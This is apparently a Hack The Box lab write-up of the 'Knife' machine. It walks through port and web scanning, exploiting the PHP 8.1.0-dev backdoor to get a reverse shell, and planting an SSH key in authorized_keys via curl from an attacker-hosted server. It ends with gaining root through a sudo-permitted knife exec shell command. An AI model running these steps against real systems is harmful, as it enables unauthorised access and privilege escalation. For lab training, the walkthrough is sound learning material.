HTB: Knife


I run nmap and found the ports 22 and 80 open.

└──╼ ports=$(nmap -p- -T4 -Pn -n | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
└──╼ echo $ports 
└──╼ nmap -sC -sV -Pn -p$ports
Starting Nmap 7.92 ( ) at 2022-05-07 14:36 BST
Nmap scan report for
Host is up (0.049s latency).

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title:  Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Because the port 80 is open, I check if there is a web hosted on the machine. There is a web, but doesn’t have anything interesting, just an empty static web.

A directory scan with gobuster reveals one directory, “server-status”, but still nothing interesting.

I use nikto to scan the web and found something interesting, the “X-Powered-By” header is using PHP/8.1.0-dev, that php version was released with a backdoor…

└──╼ nikto -h
- Nikto v2.1.5
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2022-05-07 14:44:33 (GMT1)
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: PHP/8.1.0-dev
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ DEBUG HTTP verb may show server debugging information. See for details.
+ 6544 items checked: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2022-05-07 14:49:59 (GMT1) (326 seconds)
+ 1 host(s) tested

User flag

With a quick search I found two exploits on GitHub, exploit-1 and exploit-2, I downloaded the first one because it will directly open a reverse shell on the target and seems more simple to use, perfect for my objective.

I cloned the repository and run the script. It worked perfectly, I took the flag and continue with the priv esc.

└──╼ ./
Checking if host is vulnerable...

Vulnerable --> PHP/8.1.0
[+] Spawning shell

$ whoami
$ ls -l /home/james
total 4
-r-------- 1 james james 33 May  7 11:56 user.txt

Root flag

First I upgraded the shell just for commodity reasons. To accomplish this I will generate an ssh key and add it to the “authorized_keys” file of the james user.

# create the ssh key and host a web server
└──╼ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/user/.ssh/id_rsa): ./id_rsa
└──╼ python3 -m http.server 8080
Serving HTTP on port 8080 ( ...

# on the target download and add the key to the "authorized_keys" file
$ curl > /home/james/.ssh/authorized_keys

# connect to the target using ssh
└──╼ ssh -i id_rsa james@
james@knife:~$ whoami

I upload to the machine for a quick enumeration, and quickly found several vulnerabilities:

  1. Sudo version is vulnerable to priv esc.
  2. Vulnerable to CVE-2021-4034 (priv esc).
  3. We can run the command “/usr/bin/knife” with sudo.
╔══════════╣ Sudo version
Sudo version 1.8.31

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

The first two are very easy to exploit (just download the exploit and run it), so I will be exploring the third one.

I search on google and found that the program knife actually exists.

I search for it on GTFOBins and discover an easy way to priv esc taking advantage of that we can execute it with sudo.

james@knife:~$ sudo knife exec -E 'exec "/bin/sh"'
# whoami
# ls -l /root/root.txt
-r-------- 1 root root 33 May  7 11:56 /root/root.txt

And that’s it! I’m root.

Scroll to Top